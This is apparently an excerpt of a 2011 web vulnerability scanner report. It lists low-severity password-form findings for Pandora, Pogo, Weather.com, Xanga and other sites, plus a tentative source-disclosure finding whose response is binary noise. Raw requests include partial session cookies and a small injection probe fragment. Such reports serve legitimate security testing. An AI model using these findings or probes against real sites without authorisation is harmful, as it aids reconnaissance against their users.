Confidence: | Certain |
Host: | http://www.pandora.com |
Path: | /login.vm |
Issue detail
The page contains a form with the following action URL:- https://www.pandora.com
/login.vm
- login_password
Request
GET /login.vm?target= Host: www.pandora.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=118078728 |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:23:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 13109 <html> <head> <title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title> <link rel="stylesheet" type="text/css" href="/styles/pandora <link rel="alter ...[SNIP]... <div id="content"> <form name="loginform" action="https://www <b> ...[SNIP]... <br> <input type="password" name="login_password" size="20" style="font-size:10px;"> <input type="image" src="/images/login.gif" style="position:relative ...[SNIP]... |
11.31. http://www.pandora.com/people/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pandora.com |
Path: | /people/ |
Issue detail
The page contains a form with the following action URL:- https://www.pandora.com
/login.vm
- login_password
Request
GET /people/ HTTP/1.1 Host: www.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:20:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 13116 <html> <head> <title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title> <link rel="stylesheet" type="text/css" href="/styles/pandora <link rel="alter ...[SNIP]... <div id="content"> <form name="loginform" action="https://www <b> ...[SNIP]... <br> <input type="password" name="login_password" size="20" style="font-size:10px;"> <input type="image" src="/images/login.gif" style="position:relative ...[SNIP]... |
11.32. http://www.peanutlabs.com/adminLogin.php previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /adminLogin.php |
Issue detail
The page contains a form with the following action URL:- http://www.peanutlabs.com
/?cmd=admin_login
- varPassword
Request
GET /adminLogin.php HTTP/1.1 Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:06:55 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Content-Length: 2615 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div class="topLarge"> <form name="" method="POST" action="?cmd=admin_login" <div class=""> ...[SNIP]... <td><input class="border inputField200" name="varPassword" type="password"></td> ...[SNIP]... |
11.33. http://www.pogo.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | / |
Issue detail
The page contains a form with the following action URL:- http://www.pogo.com
/action/pogo/lightreg /module.do?pageSection =Home-reg-module-3
- password
- password_confirm
Request
GET /?sl=2&f9258%22%3E Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:55:14 GMT Server: Apache-Coyote/1.1 Content-Length: 429533 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div align="center" id="marketing"> <form name="regSignupform" method="POST" action="/action/pogo <div id="regmodWrapper"> ...[SNIP]... <br/> <input type="password" name="password" maxlength="16" tabindex="2" value="" class="field" id="choosePassword" title="Choose a password"><br/> <input type="password" name="password_confirm" maxlength="16" tabindex="3" value="" class="field" id="confirmPassword" title="Re-enter your password"><br /> ...[SNIP]... |
11.34. http://www.pogo.com/account/verify-password.do previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/verify-password |
Issue detail
The page contains a form with the following action URL:- http://www.pogo.com
/account/verify-password .do
- password
Request
GET /account/verify-password Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:26:27 GMT Server: Apache-Coyote/1.1 Content-Length: 21370 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> <form name="my-account-form" method="post" action="/account/verify <div class="page-hdr-wrapper"> ...[SNIP]... </label> <input type="password" name="password" maxlength="16" tabindex="1" value="" style="width:200px;margin <div class="clear"> ...[SNIP]... |
11.35. http://www.pogo.com/action/pogo/lightregview.do previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogo/lightregview |
Issue detail
The page contains a form with the following action URL:- http://www.pogo.com
/action/pogo/lightreg.do
- password
- password_confirm
Request
GET /action/pogo/lightregview Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:25:26 GMT Server: Apache-Coyote/1.1 Content-Length: 43913 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div style="position:absolute; visibility:hidden;"> <form name="regSignupform" method="POST" action="/action/pogo <input type="hidden" name="site" value="pogo"> ...[SNIP]... </label> <input type="password" name="password" maxlength="16" tabindex="2" value="" class="reg inl"> <a href="javascript:void(0)" onclick="showLayer('popup ...[SNIP]... </label> <input type="password" name="password_confirm" maxlength="16" tabindex="3" value="" class="reg inl"> <div class="clear10"> ...[SNIP]... |
11.36. https://www.pogo.com/action/pogo/signin.do previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://www.pogo.com |
Path: | /action/pogo/signin.do |
Issue detail
The page contains a form with the following action URL:- https://www.pogo.com
/action/pogo/login.do
- password
Request
GET /action/pogo/signin.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:44:52 GMT Server: Apache-Coyote/1.1 Content-Length: 26159 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <td width="590" id="main" valign="top"> <form name="loginLoginform" method="post" action="/action/pogo <div class="page-hdr-wrapper"> ...[SNIP]... <td class="desc"> <input type="password" name="password" maxlength="16" size="13" tabindex="2" value=""> </td> ...[SNIP]... |
11.37. http://www.rockband.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.rockband.com |
Path: | / |
Issue detail
The page contains a form with the following action URL:- http://www.rockband.com/
- password
Request
GET / HTTP/1.1 Host: www.rockband.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache X-MyHeader: (null) X-Duration: D=677765 microseconds Content-Type: text/html; charset=utf-8 Expires: Sun, 09 Jan 2011 02:53:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 09 Jan 2011 02:53:52 GMT Content-Length: 19192 Connection: close Set-Cookie: rb_s=3a49e7e697e2c5f <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charse ...[SNIP]... <div id="sign_in_form <form> username: <input type="text" name="username" id="username" /> password: <input type="password" name="password" id="password" /> remember me: <input type="checkbox" name="remember" id="remember" value="true" /> ...[SNIP]... |
11.38. http://www.weather.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.weather.com |
Path: | / |
Issue detail
The page contains a form with the following action URL:- https://registration
.weather.com/ursa/login
- password
Request
GET / HTTP/1.1 Host: www.weather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache SVRNAME: wxii2x06 Cache-Control: max-age=30 Expires: Sun, 09 Jan 2011 01:44:21 GMT Content-Language: en-US Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 168646 Date: Sun, 09 Jan 2011 01:44:02 GMT X-Varnish: 736582048 736569742 Age: 11 Via: 1.1 varnish Connection: keep-alive X-Cache-Hits: 22 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local Weath ...[SNIP]... <ul class="twc-tier-2"> <form class="twc-sign-in" action="https:/ <label for="twc-header-uid"> ...[SNIP]... </label> <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title=""> <input class="twc-sign-in-button ...[SNIP]... |
11.39. http://www.weather.com/weather/local/48617 previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.weather.com |
Path: | /weather/local/48617 |
Issue detail
The page contains a form with the following action URL:- https://registration
.weather.com/ursa/login
- password
Request
GET /weather/local/48617 HTTP/1.1 Host: www.weather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 09 Jan 2011 01:44:04 GMT Server: Apache SVRNAME: web2x00 Location: http://www.weather.com Cache-Control: no-cache Pragma: no-cache Vary: Accept-Encoding Keep-Alive: timeout=1, max=7403 Connection: Keep-Alive Content-Type: text/html Content-Length: 85909 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML> <HEAD> <TITLE>Page Not Found</TITLE> <script language="JavaScript"> var usingGrids = ...[SNIP]... <ul class="twc-tier-2"> <form class="twc-sign-in" action="https:/ <label for="twc-header-uid"> ...[SNIP]... </label> <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title=""> <input class="twc-sign-in-button ...[SNIP]... |
11.40. http://www.weather.com/weather/local/48858 previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.weather.com |
Path: | /weather/local/48858 |
Issue detail
The page contains a form with the following action URL:- https://registration
.weather.com/ursa/login
- password
Request
GET /weather/local/48858 HTTP/1.1 Host: www.weather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 09 Jan 2011 01:44:04 GMT Server: Apache SVRNAME: web2x03 Location: http://www.weather.com Cache-Control: no-cache Pragma: no-cache Vary: Accept-Encoding Keep-Alive: timeout=1, max=7380 Connection: Keep-Alive Content-Type: text/html Content-Length: 85910 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML> <HEAD> <TITLE>Page Not Found</TITLE> <script language="JavaScript"> var usingGrids = ...[SNIP]... <ul class="twc-tier-2"> <form class="twc-sign-in" action="https:/ <label for="twc-header-uid"> ...[SNIP]... </label> <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title=""> <input class="twc-sign-in-button ...[SNIP]... |
11.41. http://www.weather.com/weather/local/48879 previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.weather.com |
Path: | /weather/local/48879 |
Issue detail
The page contains a form with the following action URL:- https://registration
.weather.com/ursa/login
- password
Request
GET /weather/local/48879 HTTP/1.1 Host: www.weather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 09 Jan 2011 01:44:05 GMT Server: Apache SVRNAME: web2x05 Location: http://www.weather.com Cache-Control: no-cache Pragma: no-cache Vary: Accept-Encoding Keep-Alive: timeout=1, max=7495 Connection: Keep-Alive Content-Type: text/html Content-Length: 85910 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML> <HEAD> <TITLE>Page Not Found</TITLE> <script language="JavaScript"> var usingGrids = ...[SNIP]... <ul class="twc-tier-2"> <form class="twc-sign-in" action="https:/ <label for="twc-header-uid"> ...[SNIP]... </label> <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title=""> <input class="twc-sign-in-button ...[SNIP]... |
11.42. http://www.weather.com/weather/local/USMI0020 previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.weather.com |
Path: | /weather/local/USMI0020 |
Issue detail
The page contains a form with the following action URL:- https://registration
.weather.com/ursa/login
- password
Request
GET /weather/local/USMI0020 HTTP/1.1 Host: www.weather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 09 Jan 2011 01:44:03 GMT Server: Apache SVRNAME: web2x07 Location: http://www.weather.com Cache-Control: no-cache Pragma: no-cache Vary: Accept-Encoding Keep-Alive: timeout=1, max=7485 Connection: Keep-Alive Content-Type: text/html Content-Length: 85909 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML> <HEAD> <TITLE>Page Not Found</TITLE> <script language="JavaScript"> var usingGrids = ...[SNIP]... <ul class="twc-tier-2"> <form class="twc-sign-in" action="https:/ <label for="twc-header-uid"> ...[SNIP]... </label> <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title=""> <input class="twc-sign-in-button ...[SNIP]... |
11.43. http://www.xanga.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.xanga.com |
Path: | / |
Issue detail
The page contains a form with the following action URL:- http://www.xanga.com
/default.aspx
- XangaHeader$txtSigni
nPassword
Request
GET / HTTP/1.1 Host: www.xanga.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: fp-promo-count=1 X-Powered-By: ASP.NET Date: Sun, 09 Jan 2011 01:44:13 GMT Connection: close Content-Length: 82140 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... <div class="modulecontent"> <form id="SigninForm" class="Form1" method="post" action="http://www.xanga <input name="IsPostBack" type="hidden" id="IsPostBack" /> ...[SNIP]... <div class="itembody"> <input name="XangaHeader <a id="signin" href="javascript: SigninSubmit();" tabindex="3"> ...[SNIP]... |
12. Source code disclosure previous next
Summary
Severity: | Low |
Confidence: | Tentative |
Host: | http://www.peanutlabs.com |
Path: | /publisher/dashboard2 |
Issue detail
The application appears to disclose some server-side source code written in PHP.Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.Request
GET /publisher/dashboard2 Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:35:43 GMT Server: Apache Last-Modified: Fri, 12 Feb 2010 07:15:38 GMT ETag: "822f3-8a2e3-47f6208 Accept-Ranges: bytes Vary: Accept-Encoding,User Content-Type: text/plain Content-Length: 565987 0..... *.H..........0.......1.0 ..+......0..... *.H.........|....wCWS ....x... .eYU .C...!....b...........Y.. .B....[........"A...*..3. ...[SNIP]... <AC...~..ap...I..]n..0X.. ...X.......b...6....4.... 3.......[nD.........0...6..*..0y.Yf;....}..f~;{.Y.<hXk&Z>{0.. .r".Kq.nT.dT..p*...t...'. q..........6.7~..D..v..1X ..am.........9..c$7h..... nSa. k....{.....#.[....bm4Fc. \D...N....N...l..>.n...b/ /...VLz.K.l.......*|b.... OZ.h.S..(k..ou;.h..X....) s..9...;.3../....W.t.Ux.. D..]n........>sWL.!..8.F .K...H...E.c../HA.0.*..t |......^~@.w..~M.|.d3.K. /.....?hp.,....n.KF.=r.J...3 .V..qP..Jx6.j..... ..].q.Jd. .......e<,... ...4.......3...}.;1|... ...... ..1...M..L..nN..H..}.... w...R.../...G...\AJ....[. K10...S...m8?...0..7.B#. ....g.0..Q.C.4..i^@.4...%....F^. o.=...B.7.@. !..Z.$ ..p..J!..."X%l..v...2o. A.pl.T#..^....=SX...c......1...} .A....y.r.t..G.'d.@.f.. |`.R. .>..A.P..;.l...@.7.B....c ....#..... .;..>..0../}.......p..T.) gC.f."...$?.6....(.6B.^.. .s.......B..}-T.......g. .....(BV+m.......!p....z3 =.......a.........\...... .pZC...m...W...&xKW.Cm. N.2.a.Qp.).,/ .".c%Q..Om..(.D...D.]d... Y{.t`/*bg...R.Yw.|DP..EA? ......F..,-..`..,/.z0.#.- ...Xp.....?...Hr.@..3.Nq. |